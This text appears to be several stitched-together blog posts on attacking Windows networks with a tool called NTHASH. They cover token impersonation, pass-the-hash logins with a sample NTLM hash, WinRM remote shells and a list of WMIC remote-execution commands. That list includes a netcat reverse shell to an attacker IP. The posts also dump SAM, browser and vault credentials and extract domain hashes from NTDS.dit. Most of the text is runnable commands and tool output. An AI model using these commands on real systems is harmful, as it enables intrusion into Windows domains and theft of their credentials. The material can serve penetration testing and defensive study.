In previous articles, we have used Pass The Hass to perform lateral movement.
This time, lets drop PTH and use token impersonation.
Indeed, if you are lucky enough to be a local admin you can impersonate a token owned by another user currently logged on the same system as you (it could be a terminal server).
That other user may happen to be admin on systems where you currently dont have access to (yet).
Impersonating this user will let you perform lateral movement.
This is as simple as running NTHASH-win64.exe /runastoken /pid:xxx where pid is owned by that other user.
Just keep in mind that you need to be running an elevated shell to do so.
If not done yet, simply run NTHASH-win64.exe /runas before running the command above.
As simple as that : again, no need to know the user password (nor the hash this time).
Once running under the context of this other user you can then run commands like :
NTHASH-win64.exe /chrome
NTHASH-win64.exe /firefox
NTHASH-win64.exe /enumcred
NTHASH-win64.exe /enumcred2
NTHASH-win64.exe /enumvault
…
Last one on the « pass the hash » series.
Initially we used a remote RDP console.
We then demonstrated netcat reverse shell.
What if we dont have RDP or cant/dont want to use netcat to the remote target?
WinRM to the rescue !
1.Ensure WinRM is set on the attacker host : winrm quickconfig
2.Add trusted hosts * (or filter to an ip) on attacker host : powershell « Set-Item WSMan:\localhost\Client\TrustedHosts -Value « * » -Force »
3.Enable psremoting on the remote target host (use wmic / see previous article) : powershell.exe « enable-psremoting -force »
4.Add trusted hosts * (or filter to an ip) on attacker host : powershell « Set-Item WSMan:\localhost\Client\TrustedHosts -Value « * » -Force » (use wmic / see previous article)
5.Enjoy a remote shell under powershell (from the attacker host) : Enter-PSSession -ComputerName target
In previous article, we have introduced the used of WMIC in a « pass the hash » shell.
See below a list of useful wmic commands of gathered around the internet:
rem remember impersonate is ok but delegate is not
rem become familiar with the available aliases
wmic alias list brief
rem see the available methods for any class
wmic [class] call /?
rem file stuff
wmic /node:target DATAFILE where « drive=’c:’ AND path=’\\windows\\' » GET Name,readable,size
wmic /node:target datafile « c:\\temp\\test.txt » call rename c:\temp\abc.txt
wmic /node:target datafile « c:\\temp\\test.txt » call copy c:\temp\abc.txt
rem process stuff
wmic /node:target process call create « nc attacker-ip 9000 -e cmd.exe »
wmic /node:target process call create « cmd.exe /c echo test > c:\temp\test.txt »
wmic /node:target process where name= »explorer.exe » call terminate
wmic /node:target process where processid= »1234″ call terminate
wmic /node:target process get name, processid
rem users and groups stuff
WMIC /node:target USERACCOUNT LIST brief
wmic /node:target path Win32_GroupUser
Following previous article on NTHASH, lets see how to perform lateral movement using « pass the hash » (pth).
In 3 steps, lets retrieve some hashes and then lets perform a PTH (using MS RDP client).
1.Retrieve the hash
NTHASH-win64.exe /dumpsam
or NTHASH-win64.exe /dumphashes /system
or
reg save hklm\sam sam.sav and reg save hklm\system system.sav
NTHASH-win64.exe /dumphashes /offline
or (in a domain env)
NTHASH-win64.exe /logonpasswords
2.Pass the hash NTHASH-win64.exe /pth /user:username /password:8846F7EAEE8FB117AD06BDD830B7586C /domain:.
3.In the newly opened cmd « pth » shell, type mstsc /restrictedadmin /v:target
You will end up logged as the « username » account in a RDP console on server named « target ».
Try a simple whoami for fun and go back to credential harvesting for this account using /firefox, /chrome, /enumvault, /enumcred, etc.
And you never had to enter the « username » password…
Note that any other client tool (preferably built in windows) that inherit ntlm credentials from current logon session will work too (tasklist/taskkill, wmic, net, winrm/powershell, psexec, etc)
Decrypt NTDS (aka NT Directory Service) active directory hashes for servers up to windows 2012r2 (rc4) and windows 2016 and up (aes). NTDS uses the Extensible Storage Engine format (aka ESE).
You can dump all necessary files (registry hives and ntds database) with
powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"
2/
You need the OS (here a domain controller) syskey to decrypt a NTDS database. You can obtain the systemkey offline using nthash and the system and security registry hives.
Your sysem and security hives may be inconsistent in which case make sure to get not only the hives but also all logs along. Then open it in regedit and the hives and logs should be consolidated altogether, ready to be used by nthash.
4/
Your ntds.dit may be corrupted. check this out with esentutl /g ntds.dit and then repait it with esentutl /p ntds.dit.
esentutl /g ntds.dit
Extensible Storage Engine Utilities for Microsoft(R) Windows(R)
Version 6.3
Copyright (C) Microsoft Corporation. All Rights Reserved.
Initiating INTEGRITY mode...
Database: ntds.dit
Temp. Database: .\TEMPINTEG26304.EDB
Checking database integrity.
The database is not up-to-date. This operation may find that
this database is corrupt because data from the log files has
yet to be placed in the database.
To ensure the database is up-to-date please use the 'Recovery' operation.
Scanning Status (% complete)
0 10 20 30 40 50 60 70 80 90 100
|----|----|----|----|----|----|----|----|----|----|
...................................................
Integrity check completed.
Database is CORRUPTED, the last full backup of this database was on 04/10/2024 10:30:19
Operation terminated with error -1206 (JET_errDatabaseCorrupted, Non database file or corrupted db) after 4.297 seconds.
esentutl /p ntds.dit
Extensible Storage Engine Utilities for Microsoft(R) Windows(R)
Version 6.3
Copyright (C) Microsoft Corporation. All Rights Reserved.
Initiating REPAIR mode...
Database: ntds.dit
Temp. Database: TEMPREPAIR19620.EDB
Checking database integrity.
The database is not up-to-date. This operation may find that
this database is corrupt because data from the log files has
yet to be placed in the database.
To ensure the database is up-to-date please use the 'Recovery' operation.
Scanning Status (% complete)
0 10 20 30 40 50 60 70 80 90 100
|----|----|----|----|----|----|----|----|----|----|
...................................................
Initiating DEFRAGMENTATION mode...
Database: ntds.dit
Defragmentation Status (% complete)
0 10 20 30 40 50 60 70 80 90 100
|----|----|----|----|----|----|----|----|----|----|
...................................................
Moving 'TEMPREPAIR19620.EDB' to 'ntds.dit'... DONE!
Note:
It is recommended that you immediately perform a full backup
of this database. If you restore a backup made before the
defragmentation, the database will be rolled back to the state
it was in at the time of that backup.
Operation completed successfully in 14.515 seconds.